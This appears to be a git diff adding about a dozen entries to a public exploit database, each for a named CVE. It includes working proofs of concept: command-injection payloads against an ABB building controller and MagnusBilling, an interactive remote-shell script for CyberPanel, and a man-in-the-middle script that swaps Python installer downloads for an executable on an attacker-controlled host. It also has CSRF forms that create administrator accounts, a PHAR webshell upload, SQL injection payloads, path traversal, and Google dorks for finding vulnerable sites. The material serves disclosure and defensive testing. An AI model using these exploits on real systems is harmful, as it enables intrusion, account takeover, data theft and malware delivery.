IP and BACnet MS/TP field controllers for ASPECT® and INTEGRA™ +building management solutions. ABB BACnet controllers are designed for intelligent +control of HVAC equipment such as central plant, boilers, chillers, cooling towers, +heat pump systems, air handling units (constant volume, variable air volume, and +multi-zone), rooftop units, electrical systems such as lighting control, variable +frequency drives and metering. + +The FLXeon Controller Series uses BACnet/IP standards to deliver unprecedented +connectivity and open integration for your building automation systems. It's scalable, +and modular, allowing you to control a diverse range of HVAC functions. + +Desc: The ABB Cylon FLXeon BACnet controller is vulnerable to authenticated remote root +code execution via the /api/timeConfig endpoint. An attacker with valid credentials +can inject arbitrary system commands by manipulating parameters such as tz, timeServerYN, +and multiple timeDate fields. The vulnerability exists due to improper input validation +in timeConfig.js, where user-supplied data is executed via ChildProcess.exec() without +adequate sanitization. + +Tested on: Linux Kernel 5.4.27 + Linux Kernel 4.15.13 + NodeJS/8.4.0 + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5910 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5910.php +CVE ID: CVE-2024-48841 +CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48841 + + +21.04.2024 + +-- + + +$ cat project + + P R O J E C T + + .| + | | + |'| ._____ + ___ | | |. |' .---"| + _ .-' '-. | | .--'| || | _| | + .-'| _.| | || '-__ | | | || | + |' | |. | || | | | | || | + ____| '-' ' "" '-' '-.' '` |____ +░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ +░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ + ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ + ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ + + +$ curl -k -X PUT "https://7.3.3.1/api/timeConfig" \ +> -H "Cookie: user_sid=xxx" \ +> -H "Content-Type: application/json" \ +> -d '{"timeConfig":{"timeDate":{\ +> "yy":"`sleep 17`",\ +> "mm":"`sleep 17`",\ +> "dd":"`sleep 17`",\ +> "h":"`sleep 17`",\ +> "m":"`sleep 17`",\ +> "s":"`sleep 17`"},\ +> "tz":"`sleep 17`",\ +> "tzList":[],\ +> "timeServerYN":"`sleep 17`",\ +> "timeServer":"1.1.1.1",\ +> "timeServerSync":false}}' \ No newline at end of file diff --git a/exploits/multiple/local/52190.py b/exploits/multiple/local/52190.py new file mode 100755 index 000000000..0a5bbbd7a --- /dev/null +++ b/exploits/multiple/local/52190.py @@ -0,0 +1,40 @@ +# Exploit Title: qBittorrent 5.0.1 MITM RCE +# Date: 01/02/2025 +# Exploit Author: Jordan Sharp +# Vendor Homepage: https://github.com/qbittorrent/qBittorrent +# Software Link: https://www.qbittorrent.org/download +# Version: < 5.0.1 +# Tested on: Windows 10 +# CVE : CVE-2024-51774 + +Run the PoC on a MITM machine intercepting the host + +"""PoC exploit for CVE-2024-51774""" +from mitmproxy import http + +targets = [ + "https://www.python.org/ftp/python/3.10.11/python-3.10.11-amd64.exe", + "https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe", + "https://www.python.org/ftp/python/3.10.11/python-3.10.11.exe", + "https://www.python.org/ftp/python/3.8.10/python-3.8.10.exe", + "https://www.python.org/ftp/python/3.4.3/python-3.4.3.msi", + "https://www.python.org/ftp/python/3.8.5/python-3.8.5-amd64.exe", + "https://www.python.org/ftp/python/3.8.5/python-3.8.5.exe", + "https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe", + "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe", + "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe", + "https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe", + "https://www.python.org/ftp/python/3.6.6/python-3.6.6.exe", + "https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exe", + "https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi", + "https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe" +] + +SUBSTITUTE_URL = "http://192.168.50.2:6666/calc.exe" + +def request(flow: http.HTTPFlow) -> None: + """ + Inject any exe instead of a Python installer. + """ + if flow.request.pretty_url in targets: + flow.request.url = SUBSTITUTE_URL \ No newline at end of file diff --git a/exploits/multiple/webapps/52170.txt b/exploits/multiple/webapps/52170.txt new file mode 100644 index 000000000..8e5b5f8c7 --- /dev/null +++ b/exploits/multiple/webapps/52170.txt @@ -0,0 +1,15 @@ +# Exploit Title: [MagnusBilling 6.x and 7.x Unauthenticated Remote Command Injection Vulnerability] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/magnussolution/magnusbilling7] +# Software Link: [https://github.com/magnussolution/magnusbilling7] +# Version: [7.3.0] +# Tested on: [Centos] +# CVE : [CVE-2023-30258] + +PoC: +# PoC URL for Command Injection +http://magnusbilling/lib/icepay/icepay.php?democ=testfile; id > /tmp/injected.txt +Result: This PoC attempts to inject the id command. + +[Replace Your Domain Name] \ No newline at end of file diff --git a/exploits/multiple/webapps/52172.py b/exploits/multiple/webapps/52172.py new file mode 100755 index 000000000..fd0c1d753 --- /dev/null +++ b/exploits/multiple/webapps/52172.py @@ -0,0 +1,74 @@ +# Exploit Title: CyberPanel v2.3.5, v2.3.6 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 10/29/2024 +# Exploit Author: Luka Petrovic (refr4g) +# Vendor Homepage: https://cyberpanel.net/ +# Software Link: https://github.com/usmannasir/cyberpanel +# Version: 2.3.5, 2.3.6, 2.3.7 (before patch) +# Tested on: Ubuntu 20.04, CyberPanel v2.3.5, v2.3.6, v2.3.7 (before patch) +# CVE: CVE-2024-51378 +# PoC Repository: https://github.com/refr4g/CVE-2024-51378 +# Blog Post: https://refr4g.github.io/posts/cyberpanel-command-injection-vulnerability/ + +#!/usr/bin/python3 + +import argparse +import httpx +import sys + +RED = "\033[91m" +GREEN = "\033[92m" +CYAN = "\033[96m" +MAGENTA = "\033[95m" +YELLOW = "\033[93m" +RESET = "\033[0m" + +print(f"{RED}CVE-2024-51378{RESET} - Remote Code Execution Exploit") +print(f"{CYAN}Author:{RESET} {GREEN}Luka Petrovic (refr4g){RESET}") +print() + +allowed_endpoints = ["/ftp/getresetstatus", "/dns/getresetstatus"] + +parser = argparse.ArgumentParser() +parser.add_argument("target", help=f"{CYAN}Target URL (with http/https prefix){RESET}") +parser.add_argument("endpoint", help=f"{CYAN}Endpoint to target, choose from {allowed_endpoints}{RESET}") +args = parser.parse_args() + +if args.endpoint not in allowed_endpoints: + print(f"{RED}Error: Invalid endpoint '{args.endpoint}'.{RESET}") + parser.print_help() + sys.exit(1) + +target = args.target +endpoint = args.endpoint + +client = httpx.Client(base_url=target, verify=False) + +try: + response = client.get("/") + response.raise_for_status() +except httpx.RequestError: + print(f"{RED}Error: Unable to reach the target {target}. Please check the URL and your connection.{RESET}") + sys.exit(1) + +def get_token(): + response = client.get("/") + return response.cookies.get("csrftoken") + +def rce(client, csrf_token, cmd, endpoint): + headers = { + "X-CSRFToken": csrf_token, + "Content-Type": "application/json", + "Referer": str(client.base_url) + } + payload = '{"statusfile": "; %s; #"}' % cmd + response = client.request("OPTIONS", endpoint, headers=headers, data=payload) + return response.json().get("requestStatus") + +csrf_token = get_token() +if not csrf_token: + print(f"{RED}Failed to retrieve CSRF token. Exiting.{RESET}") + sys.exit(1) + +while True: + cmd = input(f"{YELLOW}$> {RESET}") + print(rce(client, csrf_token, cmd, endpoint)) \ No newline at end of file diff --git a/exploits/multiple/webapps/52177.md b/exploits/multiple/webapps/52177.md new file mode 100644 index 000000000..137846e61 --- /dev/null +++ b/exploits/multiple/webapps/52177.md @@ -0,0 +1,41 @@ +# Exploit Title: Nagios Log Server 2024R1.3.1 - API Key Exposure +# Date: 2025-04-08 +# Exploit Author: Seth Kraft, Alex Tisdale +# Vendor Homepage: https://www.nagios.com/ +# Vendor Changelog: https://www.nagios.com/changelog/#log-server +# Software Link: https://www.nagios.com/products/log-server/download/ +# Version: Nagios Log Server 2024R1.3.1 and below +# Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04) +# CWE: CWE-200, CWE-284, CWE-522 +# CVSS: 9.8 (CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H) +# Type: Information Disclosure, Improper Access Control +# Exploit Risk: Critical + +## Disclosure +For ethical research purposes only. Do not target systems without proper authorization. + +## Description +An API-level vulnerability in Nagios Log Server 2024R1.3.1 allows any user with a valid API token to retrieve a full list of user accounts along with their plaintext API keys, including administrator credentials. This flaw enables user enumeration, privilege escalation, and full system compromise via unauthorized use of exposed tokens. + +## PoC + +### Step 1: Access the vulnerable endpoint + +``` +curl -X GET "http:///nagioslogserver/index.php/api/system/get_users?token=" +``` + +## Sample Response + +```json +[ + { + "name": "devadmin", + "username": "devadmin", + "email": "test@example.com", + "apikey": "dcaa1693a79d651ebc29d45c879b3fbbc730d2de", + "auth_type": "admin", + ... + } +] +``` \ No newline at end of file diff --git a/exploits/multiple/webapps/52181.txt b/exploits/multiple/webapps/52181.txt new file mode 100644 index 000000000..2b0eae8ff --- /dev/null +++ b/exploits/multiple/webapps/52181.txt @@ -0,0 +1,37 @@ +# Exploit Tile: CMU CERT/CC VINCE 2.0.6 - Stored XSS +# Vendor: Carnegie Mellon University +# Product web page: https://www.kb.cert.org/vince/ +# Affected version: <=2.0.6 + +Summary: VINCE is the Vulnerability Information and Coordination +Environment developed and used by the CERT Coordination Center +to improve coordinated vulnerability disclosure. VINCE is a +Python-based web platform. + +Desc: The framework suffers from an authenticated stored +cross-site scripting vulnerability. Input passed to the +'content' POST parameter is not properly sanitised before +being returned to the user. This can be exploited to execute +arbitrary HTML/JS code in a user's browser session in context +of an affected site. + +Tested on: nginx/1.20.0 + Django 3.2.17 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2025-5917 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5917.php + + +13.01.2023 + +-- + + +$ curl -k https://kb.cert.org/vince/comm/post/CASE_NO \ +> -H "Cookie: sessionid=xxxx" \ +> -d 'content=">ZSL%0A%0A&csrfmiddlewaretoken=xxx&paginate_by=10&reply_to=xxxxx' \ No newline at end of file diff --git a/exploits/multiple/webapps/52185.txt b/exploits/multiple/webapps/52185.txt new file mode 100644 index 000000000..ac7130a35 --- /dev/null +++ b/exploits/multiple/webapps/52185.txt @@ -0,0 +1,24 @@ +# Exploit Title: WebFileSys 2.31.0 - Directory Path Traversal in relPath Parameter +# Date: Nov 25, 2024 +# Exploit Author: Korn Chaisuwan, Charanin Thongudom, Pongtorn Angsuchotmetee +# Vendor Homepage: http://www.webfilesys.de/webfilesys-home/index.html +# Software Link: http://www.webfilesys.de/webfilesys-home/download.html +# Version: 2.31.0 +# Tested on: macOS +# CVE : CVE-2024-53586 + +GET /webfilesys/servlet?command=mobile&cmd=folderFileList&initial=true&relPath=/../../.. HTTP/1.1 +Host: www.webfilesys.de +Cookie: JSESSIONID=BE9434E13C7CDE33D00D6F484F64EFB8 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: https://www.webfilesys.de/webfilesys/servlet?command=menuBar +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Priority: u=0, i +Te: trailers +Connection: keep-alive \ No newline at end of file diff --git a/exploits/multiple/webapps/52187.txt b/exploits/multiple/webapps/52187.txt new file mode 100644 index 000000000..b5714f388 --- /dev/null +++ b/exploits/multiple/webapps/52187.txt @@ -0,0 +1,58 @@ +# Exploit Title: GeoVision GV-ASManager 6.1.1.0 - CSRF +# Google Dork: inurl:"ASWeb/Login" +# Date: 02-FEB-2025 +# Exploit Author: Giorgi Dograshvili [DRAGOWN] +# Vendor Homepage: https://www.geovision.com.tw/ +# Software Link: https://www.geovision.com.tw/download/product/ +# Version: 6.1.1.0 or less +# Tested on: Windows 10 | Kali Linux +# CVE : CVE-2024-56901 +# PoC: https://github.com/DRAGOWN/CVE-2024-56901 + +A Cross-Site Request Forgery (CSRF) vulnerability in Geovision GV-ASManager web application with the version 6.1.1.0 or less that allows attackers to arbitrarily create Admin accounts via a crafted GET request method. This vulnerability is used in chain with CVE-2024-56903 for a successful CSRF attack. + +Requirements +To perform successful attack an attacker requires: +- GeoVision ASManager version 6.1.1.0 or less +- Network access to the GV-ASManager web application (there are cases when there are public access) +- Administrator's interaction with an open session in the browser + +Impact +The vulnerability can be leveraged to perform the following unauthorized actions: +A unauthorized account is able to: +- Modify POST method request with GET by leveraging CVE-2024-56903 vulnerability. +- Craft a malicious HTML page which makes changes in the application on behalf of the administrator account. +- Create a new administrator account on behalf of the legit administrator account. +After the successful attack, an attacker will be able to: +- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc. +- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc. +- Disrupt and disconnect services such as monitoring cameras, access controls. +- Clone and duplicate access control data for further attack scenarios. +- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization. + + +The CSRF code: + + + +
# Set the target + + # Set Username + # Set Password + # Set Email + # Set privilege 1-Normal user 2-Administrator + +
+ + + + + +After a successful attack, you will get access to: +- ASWeb - Access & Security Management +- TAWeb - Time and Attendance Management +- VMWeb - Visitor Management +- ASManager - Access & Security Management software in OS \ No newline at end of file diff --git a/exploits/multiple/webapps/52189.txt b/exploits/multiple/webapps/52189.txt new file mode 100644 index 000000000..10c997672 --- /dev/null +++ b/exploits/multiple/webapps/52189.txt @@ -0,0 +1,47 @@ +# Exploit Title: Broken Access Control in GeoVision GV-ASManager +# Google Dork: inurl:"ASWeb/Login" +# Date: 02-FEB-2025 +# Exploit Author: Giorgi Dograshvili [DRAGOWN] +# Vendor Homepage: https://www.geovision.com.tw/ +# Software Link: https://www.geovision.com.tw/download/product/ +# Version: 6.1.0.0 or less +# Tested on: Windows 10 | Kali Linux +# CVE : CVE-2024-56898 +# PoC: https://github.com/DRAGOWN/CVE-2024-56898 + + +Broken access control vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less. + +Requirements +To perform successful attack an attacker requires: +- GeoVision ASManager version 6.1.0.0 or less +- Network access to the GV-ASManager web application (there are cases when there are public access) +- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: ) + +Impact +The vulnerability can be leveraged to perform the following unauthorized actions: +A low privilege account which isn't authorized to manage accounts is able to: +- Enable and disable any account. +- Create new accounts. +- Modify privileges of any account. +- Listing accounts and their information. +After the escalation of the privileges, an attacker will be able to: +- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc. +- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc. +- Disrupt and disconnect services such as monitoring cameras, access controls. +- Clone and duplicate access control data for further attack scenarios. +- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization. + +cURL script: + +curl --path-as-is -i -s -k -X $'POST' \ + -H $'Host: [SET-TARGET]' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=0, i' -H $'Connection: keep-alive' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 111' \ + -b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \ + --data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \ + $'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf' + +After a successful attack, you will get access to: +- ASWeb - Access & Security Management +- TAWeb - Time and Attendance Management +- VMWeb - Visitor Management +- ASManager - Access & Security Management software in OS \ No newline at end of file diff --git a/exploits/php/webapps/52166.txt b/exploits/php/webapps/52166.txt new file mode 100644 index 000000000..e3b4eb996 --- /dev/null +++ b/exploits/php/webapps/52166.txt @@ -0,0 +1,30 @@ +# Exploit Title: [ flatCore < 1.5 CSRF Vulnerability for Arbitrary .php File Upload via files.upload-script.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/flatCore/flatCore-CMS] +# Software Link: [https://github.com/flatCore/flatCore-CMS] +# Version: [d3a5168] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2019-13961] + +PoC: + + + + CSRF PoC + + +
+ + + + + + + +
+ + + + +[Replace Your Domain Name] \ No newline at end of file diff --git a/exploits/php/webapps/52167.txt b/exploits/php/webapps/52167.txt new file mode 100644 index 000000000..c105fa0e0 --- /dev/null +++ b/exploits/php/webapps/52167.txt @@ -0,0 +1,27 @@ +# Exploit Title: [Gnuboard5 <= 5.3.2.8 SQL Injection via table_prefix Parameter] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/gnuboard/gnuboard5] +# Software Link: [https://github.com/gnuboard/gnuboard5] +# Version: [5.3.2.8] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2020-18662] + +PoC: +1) +POST /install/install_db.php HTTP/1.1 +Host: gnuboard +Content-Type: application/x-www-form-urlencoded +Content-Length: 100 + +mysql_user=root&mysql_pass=password&mysql_db=gnuboard&table_prefix=12`; select sleep(5)# +result: sleep 5s. +2) +curl -X POST http://gnuboard/install/install_db.php \ + -d "mysql_user=root" \ + -d "mysql_pass=password" \ + -d "mysql_db=gnuboard_db" \ + -d "table_prefix=' OR 1=1--" +result: The application does not work. + +[Replace Your Domain Name and Replace Database Information] \ No newline at end of file diff --git a/exploits/php/webapps/52168.txt b/exploits/php/webapps/52168.txt new file mode 100644 index 000000000..42d2f8b87 --- /dev/null +++ b/exploits/php/webapps/52168.txt @@ -0,0 +1,55 @@ +# Exploit Title: [GetSimpleCMS < 3.3.16 Remote Code Execution via PHAR File Upload in admin/upload.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://github.com/GetSimpleCMS/GetSimpleCMS] +# Software Link: [https://github.com/GetSimpleCMS/GetSimpleCMS] +# Version: [3.3.16] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2021-28976] + +PoC-1: +1)Create a .phar file. +1. Create the PHP script: Save your code (the one you provided) in a file, say index.php: +2. Write a PHP script to create the .phar file: Use the Phar class in PHP to package the index.php file into a .phar archive. Create a script named create_phar.php as follows: +startBuffering(); + $phar->addFromString('index.php', file_get_contents('index.php')); + $phar->setStub($phar->createDefaultStub('index.php')); + $phar->stopBuffering(); + + echo "Phar archive created successfully!"; +} catch (Exception $e) { + echo "Error: " . $e->getMessage(); +} +3. Run the script to generate the .phar file: On your terminal (assuming you're using a system that has PHP installed), run the following command to execute the script: php create_phar.php. +After running the script, you should find a file named archive.phar in your working directory. + +2)Upload file: +1. Upload the 'archive.phar' file using the vulnerable upload functionality at http://getsimplecms/admin/upload.php. +2. You can find the file at http://getsimplecms/data/uploads/. + +3)Details: + "Validation Mechanisms Before Patch": "File extension blacklist and MIME type blacklist were used but lacked specific filtering for 'phar' file types.", + "Bypass Technique": "Upload a 'phar' file, as it was not included in the original blacklist, which can be treated as a PHP archive by the server for remote code execution.", + "Request URL": "http://getsimplecms/admin/upload.php", + "Request Method": "POST", + "Request Parameters": { + "file": "" + }, + + +PoC-2: +1) LLM creates the file exploit.phar with the following contents: +malicious.php 0000644 0000000 0000000 00000000036 00000000000 010442 0 ustar 00 + +2) +1. Prepare a PHP file named 'exploit.phar' .\n +2. Send a POST request to http://getsimplecms/admin/upload.php with the 'exploit.phar' file as the 'file' parameter.\n +3. Access the uploaded file at http://getsimplecms/data/uploads/exploit.phar and execute commands by passing the 'cmd' parameter (e.g., http://getsimplecms/data/uploads/exploit.phar?cmd=id). + +[Replace Your Domain Name] \ No newline at end of file diff --git a/exploits/php/webapps/52169.txt b/exploits/php/webapps/52169.txt new file mode 100644 index 000000000..6ce964756 --- /dev/null +++ b/exploits/php/webapps/52169.txt @@ -0,0 +1,17 @@ +# Exploit Title: [RosarioSIS < 7.6.1 Unauthenticated SQL Injection via votes Parameter in PortalPollsNotes.fnc.php] +# Date: [2024-10-26] +# Exploit Author: [CodeSecLab] +# Vendor Homepage: [https://gitlab.com/francoisjacquet/rosariosis] +# Software Link: [https://gitlab.com/francoisjacquet/rosariosis] +# Version: [7.6] +# Tested on: [Ubuntu Windows] +# CVE : [CVE-2021-44567] + +PoC: +POST /ProgramFunctions/PortalPollsNotes.fnc.php HTTP/1.1 +X-Requested-With: XMLHttpRequest + +constrain and some flow: +isset( $_POST['votes'] ) && is_array( $_POST['votes'] ) && $_SERVER['HTTP_X_REQUESTED_WITH'] == 'XMLHttpRequest' && foreach ( (array) $_POST['votes'] as $poll_id => $votes_array ) && if ( ! empty( $votes_array ) ) && PortalPollsVote( $poll_id, $votes_array ) + +votes['; CREATE TABLE aaa(t text) --]=1 \ No newline at end of file diff --git a/exploits/php/webapps/52171.txt b/exploits/php/webapps/52171.txt new file mode 100644 index 000000000..eb43c8a07 --- /dev/null +++ b/exploits/php/webapps/52171.txt @@ -0,0 +1,182 @@ +My name: Francisco Moraga (BTshell) +@BTshell + +https://www.linkedin.com/in/btshell/ + +# Exploit Title: LearnPress WordPress LMS Plugin <= 4.2.7 - Unauthenticated SQL Injection via 'c_only_fields' +# Google Dork: inurl:"/wp-json/learnpress/v1/" OR inurl:"/wp-content/plugins/learnpress/" OR "powered by LearnPress" AND "version 4.2.7" +# Date: [Current Date, e.g., October 30, 2024] +# Exploit Author: [Your Name or Username] +# Vendor Homepage: https://thimpress.com/learnpress/ +# Software Link: https://wordpress.org/plugins/learnpress/ +# Version: <= 4.2.7 +# Tested on: WordPress 6.x, Ubuntu 22.04 + +CVE : CVE-2024-8522CVE-2024-8522 - SQL Injection in LearnPress WordPress Plugin (Python exploit) + +Overview + +CVE: CVE-2024-8522 + +Plugin: LearnPress – WordPress LMS Plugin (version <= 4.2.7) + +Type: SQL Injection + +Impact: High + +Affected Component: Unauthenticated endpoint parameter c_only_fields in LearnPress API + +Description + +The vulnerability exists in the LearnPress WordPress plugin, versions up to 4.2.7. An unauthenticated SQL Injection flaw is present in the c_only_fields parameter of the LearnPress API endpoint. This flaw allows attackers to execute arbitrary SQL commands by manipulating API requests without authentication. If exploited, this could lead to unauthorized database access, potentially exposing sensitive data or even allowing administrative control through database manipulation. + +Affected Code Path + +The vulnerability is triggered by accessing the LearnPress API and injecting SQL commands through the c_only_fields parameter. Below is the code path leading to this vulnerability: + +plaintext + +class-lp-db.php:702, LP_Database->execute() + +class-lp-course-db.php:564, LP_Course_DB->get_courses() + +Courses.php:241, LearnPress\Models\Courses::get_courses() + +class-lp-rest-courses-v1-controller.php:502, LP_Jwt_Courses_V1_Controller->get_courses() + +class-wp-rest-server.php:1230, WP_REST_Server->respond_to_request() + +class-wp-rest-server.php:1063, WP_REST_Server->dispatch() + +Proof of Concept (PoC) + +The vulnerability can be demonstrated by sending a request to the API endpoint with a malicious payload in the c_only_fields parameter. Below is an example of an HTTP request that injects a conditional SQL statement to test for vulnerability by causing a time delay: + +http + +GET /wp-json/learnpress/v1/courses?c_only_fields=IF(COUNT(*)!=-2,(SLEEP(10)),0) HTTP/1.1 + +Host: +targetwebsite.com + +User-Agent: curl/7.81.0 + +Accept: */* + +Exploitation Script + +The following Python script automates the process of sending malicious requests to test for this SQL injection vulnerability by measuring response time, indicating potential success if there is a delay. + +python + +import requests + +import time + +# Target URL for the API endpoint + +url = ' +http://targetwebsite.com/wp-json/learnpress/v1/courses +' + +# SQL injection payloads + +payloads = [ + +"IF(COUNT(*) > 0, SLEEP(10), 0)", # Test for successful injection + +"IF(1=1, SLEEP(10), 0)", # Basic true condition + +"IF(1=2, SLEEP(10), 0)", # Basic false condition + +] + +# Iterate over payloads and measure response time + +for payload in payloads: + +params = {'c_only_fields': payload} + +start_time = time.time() # Record start time + +try: + +# Send request to the vulnerable endpoint + +response = requests.get(url, params=params) + +# Calculate response time + +response_time = time.time() - start_time + +# Display result + +print(f"Payload: {payload} | Status Code: {response.status_code} | Response Time: {response_time:.2f} seconds") + +# Check for delay indicative of a successful SQL injection + +if response_time > 10: + +print("Potential SQL Injection vulnerability detected (delay observed).") + +else: + +print("No delay observed; injection may be unsuccessful.") + +except requests.exceptions.RequestException as e: + +print(f"Error during request: {e}") + +Google Dorks for Identifying Vulnerable Sites + +To locate potentially vulnerable websites running LearnPress, the following Google dorks can help identify sites with the plugin: + +inurl:"/wp-content/plugins/learnpress/" + +inurl:"/wp-json/learnpress/v1/" + +"powered by LearnPress" AND "version 4.2.7" + +inurl:"/wp-content/plugins/learnpress/assets/js/" + +"LearnPress" AND "WordPress LMS Plugin" + +Disclaimer: Use of these dorks should only be conducted in an ethical manner, with proper permissions for testing on identified sites. + +Impact Analysis + +If exploited, this SQL Injection vulnerability can have severe impacts, including: + +Data Breach: Unauthorized access to sensitive data within the WordPress database, such as user credentials, course data, and personal information. + +Privilege Escalation: An attacker may leverage the SQL injection to modify database entries, potentially elevating user roles and gaining administrative access. + +Site Defacement or Service Disruption: By altering content or database configurations, attackers can disrupt service availability or deface the website. + +Recommendations + +Immediate Update: Update the LearnPress plugin to a patched version when available. + +Web Application Firewall (WAF): Employ a WAF that can filter and block malicious SQL injection attempts. + +Least Privilege Access: Configure database users with the minimum necessary privileges to reduce potential impacts. + +Conclusion + +The SQL Injection vulnerability in LearnPress (<= 4.2.7) is a high-severity issue that exposes affected WordPress sites to data breaches, privilege escalation, and potential service disruption. It is crucial for site administrators using this plugin to update to a secure version and implement protective measures. + +This report summarizes the vulnerability, exploitation methods, and recommendations to mitigate risks associated with CVE-2024-8522. + +Este mensaje, incluyendo sus anexos, puede contener información clasificada como +confidencial dentro del marco del Sistema de Gestión de la Seguridad corporativo. +Si usted no es el destinatario, le rogamos lo comunique al remitente y +proceda a borrarlo, sin reenviarlo ni conservarlo, ya que su uso no +autorizado está prohibido legalmente. + +This message including any attachments may contain confidential information, +within the framework of the corporate Security Management System. +If you are not the intended recipient, please notify the sender and +delete this message without forwarding or retaining a copy, since any +unauthorized use is strictly prohibited by law. + +Enviado con el correo electrónico seguro de [Proton Mail](https://proton.me/mail/home). \ No newline at end of file diff --git a/exploits/php/webapps/52173.txt b/exploits/php/webapps/52173.txt new file mode 100644 index 000000000..c04555c2e --- /dev/null +++ b/exploits/php/webapps/52173.txt @@ -0,0 +1,56 @@ +# Exploit Title: Roundcube mail server exploit for CVE-2024-37383 (Stored XSS) +# Google Dork: +# Exploit Author: AmirZargham +# Vendor Homepage: Roundcube - Free and Open Source Webmail Software +# Software Link: Releases · roundcube/roundcubemail +# Version: Roundcube client version earlier than 1.5.6 or from 1.6 to 1.6.6. +# Tested on: firefox,chrome +# CVE: CVE-2024-37383 +# CWE: CWE-79 +# Platform: MULTIPLE +# Type: WebApps + + +Description: + + +The CVE-2024-37383 vulnerability was discovered in the Roundcube Webmail email client. This is a stored XSS vulnerability that allows an attacker to execute JavaScript code on the user's page. To exploit the vulnerability, all attackers need to do is open a malicious email using a Roundcube client version earlier than 1.5.6 or from 